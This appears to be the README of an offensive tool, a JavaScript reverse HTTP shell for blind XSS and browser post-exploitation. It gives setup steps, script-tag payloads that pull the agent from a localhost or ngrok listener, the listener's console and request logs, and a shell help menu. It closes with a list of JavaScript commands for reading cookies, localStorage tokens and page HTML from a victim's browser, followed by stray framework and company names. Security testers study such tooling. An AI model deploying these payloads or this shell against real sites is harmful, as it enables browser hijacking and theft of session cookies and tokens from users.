A reverse shell in JavaScript using HTTP to communicate, used to confirm blind XSS vulnerabilities and a tool for browser post-exploitation.
pip install pyngrok socketserver
Then, run in terminal or cmd:
python server.py
Now, run the JavaScript XSS payload on the target (Or simply open the HTML payload in the browser).
____ _ ____ _ ____
| _ \(_)_ __ ___ ___ _ __ | _ \ | / ___|
| | | | | '_ ` _ \ / _ \| '_ \| | | |_ | \___ \
| |_| | | | | | | | (_) | | | | |_| | |_| |___) |
|____/|_|_| |_| |_|\___/|_| |_|____/ \___/|____/ v1.3
<------------ Developed by DimonDev ------------>
[!] Execute one of these payloads on the target:
Local target:
<script src="http://localhost:6969/?command=get_script"></script>
The HTML payload: http://localhost:6969/
Remote target:
<script src="https://aaaabbbbcccc.ngrok-free.app/?command=get_script"></script>
The HTML payload: https://aaaabbbbcccc.ngrok-free.app
[+] Listener server started over WAN - https://aaaabbbbcccc.ngrok-free.app
[+] Listening on port 6969
When a the target is connected, it will spawn a reverse HTTP shell (type command help):
____ _ ____ _ ____
| _ \(_)_ __ ___ ___ _ __ | _ \ | / ___|
| | | | | '_ ` _ \ / _ \| '_ \| | | |_ | \___ \
| |_| | | | | | | | (_) | | | | |_| | |_| |___) |
|____/|_|_| |_| |_|\___/|_| |_|____/ \___/|____/ v1.3
<------------ Developed by DimonDev ------------>
[!] Execute one of these payloads on the target:
Local target:
<script src="http://localhost:6969/?command=get_script"></script>
The HTML payload: http://localhost:6969/
Remote target:
<script src="https://aaaabbbbcccc.ngrok-free.app/?command=get_script"></script>
The HTML payload: https://aaaabbbbcccc.ngrok-free.app
[+] Listener server started over WAN - https://aaaabbbbcccc.ngrok-free.app
[+] Listening on port 6969
127.0.0.1 - - [03/May/2023 23:47:55] "GET /?command=get_script HTTP/1.1" 200 -
127.0.0.1~#
127.0.0.1 - - [03/May/2023 23:47:55] "GET /shell HTTP/1.1" 200 -
127.0.0.1 - - [03/May/2023 23:47:56] code 404, message Not Found
127.0.0.1 - - [03/May/2023 23:47:56] "GET /favicon.ico HTTP/1.1" 404 -
undefined
127.0.0.1~#
127.0.0.1 - - [03/May/2023 23:47:56] "GET /shell?resp=undefined HTTP/1.1" 200 -
127.0.0.1~#
127.0.0.1 - - [03/May/2023 23:47:56] "GET /shell HTTP/1.1" 200 -
undefined
127.0.0.1~#
127.0.0.1 - - [03/May/2023 23:47:57] "GET /shell?resp=undefined HTTP/1.1" 200 -
127.0.0.1~#
127.0.0.1 - - [03/May/2023 23:47:58] "GET /shell HTTP/1.1" 200 -
undefined
127.0.0.1~# help
---------------------------------------------------------
Usage:
You can either input a Javascript snippet or use
the internal commands.
Commands:
help - Prints this message.
getip - Fetches the public IP of the target.
vulnscan - Scans for possible CVEs in the target
browser.
info CVE-0000-0000 - Information about a CVE.
exploit CVE-0000-0000 - (For now, it only prints
exploit-db url)
Useful JavaScript:
document.documentURI
document.location
document.domain
document.body.innerHTML
document.head.innerHTML
document.cookie
localStorage
localStorage.getItem("SOME_ITEM_OR_TOKEN")
navigator.userAgent
navigator.platform
navigator.vibrate()
navigator.javaEnabled()
navigator.languages
navigator.maxTouchPoints
navigator.buildID
----------------- Developed by DimonDev -----------------
127.0.0.1~#
You can now use the JavaScript console remotely. Here are some interesting commands to use:
document.documentURI: This property returns the URI (Uniform Resource Identifier) of the current document.document.location: This property returns a Location object, which contains information about the current URL of the document, including the protocol, host, port, pathname, and search parameters.document.domain: This property returns the domain of the current document's URL. This property is often used to enable cross-origin scripting between documents served from different domains.document.body.innerHTML: This property allows you to get or set the HTML content of the<body>element of the current document. When you set this property, the existing content of the<body>element is replaced with the new content.document.head.innerHTML: This property allows you to get or set the HTML content of the<head>element of the current document. When you set this property, the existing content of the<head>element is replaced with the new content.document.cookie: This property allows you to get or set the cookies associated with the current document. Cookies are small pieces of data that are stored on the client-side and are often used to persist user preferences or authentication information.localStorage: This is an object that provides a simple key-value store for persisting data on the client-side. Unlike cookies, data stored in localStorage is not sent to the server with every request.localStorage.getItem("SOME_ITEM_OR_TOKEN"): This method allows you to retrieve an item from localStorage based on its key. The key is a string that you provide when you store the item.navigator.platform: This property returns a string that identifies the operating system platform that the browser is running on (e.g., "MacIntel", "Win32", "Linux x86_64", etc.).navigator.vibrate(): This method allows you to trigger a vibration effect on the user's device. This method takes an array of integers that specifies the pattern of vibration (e.g.,[100, 200, 300]would vibrate for 100ms, then pause for 200ms, then vibrate for 300ms).navigator.javaEnabled(): This method returns a boolean indicating whether the browser has Java support enabled.navigator.languages: This property returns an array of strings that represents the user's preferred languages for content.navigator.maxTouchPoints: This property returns the maximum number of simultaneous touch points that the user's device supports.navigator.buildID: This property returns a string that identifies the build of the browser that the user is using. This value is often used for debugging purposes. Remember to get creative!
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent